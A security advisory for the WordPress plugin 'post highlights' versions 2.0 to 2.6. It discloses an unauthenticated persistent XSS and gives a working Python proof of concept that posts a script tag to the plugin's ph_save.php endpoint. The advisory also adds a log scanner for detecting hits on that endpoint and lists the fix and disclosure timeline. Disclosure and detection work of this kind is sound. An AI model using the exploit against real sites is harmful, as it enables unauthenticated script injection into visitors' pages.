post highlights 2.0 - 2.6, Persistent XSS

Because one of the plugin's scripts has no access protection and includes the ‘wp-load.php’ script directly, it is possible to update the ‘post highlights’ settings for any post. Using this flaw, an unauthenticated user can enable ‘post highlights’ and insert arbitrary HTML content, which is then output on the page. This output is neither filtered nor encoded, so any HTML content can be inserted, including SCRIPT or IFRAME tags.

Homepage

https://wordpress.org/plugins/post-highlights/

CVSS Score

6.4

CVSS Vector

(AV:N/AC:L/Au:N/C:P/I:P/A:N)

Attack Scope

remote

Authorization Required

None

Mitigation

Update to version 2.6.1.

Proof of Concept

The following Python script enables ‘post highlights’ for the post with ID ‘1’ and sets the ‘headline’ field to an arbitrary piece of HTML, which results in a JavaScript alert being fired.

import requests

# Unauthenticated AJAX handler shipped with the plugin; it includes wp-load.php
# itself and performs no access check in versions 2.0 - 2.6.
url = 'http://localhost/wp-content/plugins/post-highlights/ajax/ph_save.php'

# Step 1: switch 'post highlights' on for post ID 1.
payload = {
    "action": "highlight",
    "id": "1"
}
requests.post(url, data=payload)

# Step 2: store HTML in the 'headline' field; it is rendered on the page without filtering or encoding.
payload = {
    "action": "headline",
    "id": "1",
    "txt": "<script>alert('.');</script>"
}
r = requests.post(url, data=payload)
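Sites that ran a vulnerable version may want to know whether the endpoint used above was ever reached. The following scanner is an added example, not part of the advisory or the plugin: it pulls requests to ph_save.php out of web server access logs. The Apache combined log format, the constructed sample lines and the Referer heuristic are assumptions of the example.

```python
import re
from urllib.parse import urlsplit

# Endpoint named in the advisory. The Apache "combined" log format and the
# Referer heuristic are assumptions of this example, not facts from the advisory.
VULN_PATH = "/wp-content/plugins/post-highlights/ajax/ph_save.php"

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample log: two direct hits from a script, one from an editor's admin session.
SAMPLE_LOG = """\
203.0.113.5 - - [03/Nov/2014:10:15:02 +0000] "POST /wp-content/plugins/post-highlights/ajax/ph_save.php HTTP/1.1" 200 17 "-" "python-requests/2.4.3"
203.0.113.5 - - [03/Nov/2014:10:15:03 +0000] "POST /wp-content/plugins/post-highlights/ajax/ph_save.php HTTP/1.1" 200 17 "-" "python-requests/2.4.3"
198.51.100.9 - - [03/Nov/2014:10:20:44 +0000] "POST /wp-content/plugins/post-highlights/ajax/ph_save.php HTTP/1.1" 200 17 "http://blog.example/wp-admin/post.php?post=7&action=edit" "Mozilla/5.0"
198.51.100.9 - - [03/Nov/2014:10:21:00 +0000] "GET /?p=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""


def find_ph_save_hits(log_lines):
    """Return one record per request that reached ph_save.php.

    Vulnerable versions apply no authentication, so every hit deserves a look.
    Hits without a Referer from the site's own /wp-admin/ are marked suspicious:
    an editor normally triggers this AJAX call from the post editor, a script does not.
    """
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or not urlsplit(m.group("target")).path.lower().endswith(VULN_PATH):
            continue  # not a combined-format line, or not the vulnerable script
        referer = m.group("referer")
        hits.append({
            "ip": m.group("ip"), "ts": m.group("ts"), "method": m.group("method"),
            "status": int(m.group("status")), "user_agent": m.group("ua"),
            "suspicious": referer == "-" or "/wp-admin/" not in referer,
        })
    return hits


if __name__ == "__main__":
    for hit in find_ph_save_hits(SAMPLE_LOG.splitlines()):
        flag = "REVIEW" if hit["suspicious"] else "ok"
        print(f'{flag:6} {hit["ts"]} {hit["ip"]} {hit["method"]} -> {hit["status"]} ({hit["user_agent"]})')
```

A flagged hit only shows that the script was reached; confirming exploitation means checking the affected posts' ‘headline’ values for injected markup.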

Timeline

  • 2014-10-09: Discovered
  • 2014-10-09: Reported to vendor
  • 2014-10-09: CVE requested
  • 2014-10-11: CVE assigned
  • 2014-10-27: Update requested from vendor
  • 2014-11-03: Advisory released
  • 2014-11-03: Vendor contacted with intent to fix after release of advisory
  • 2014-11-03: Version 2.6.1 released – issue resolved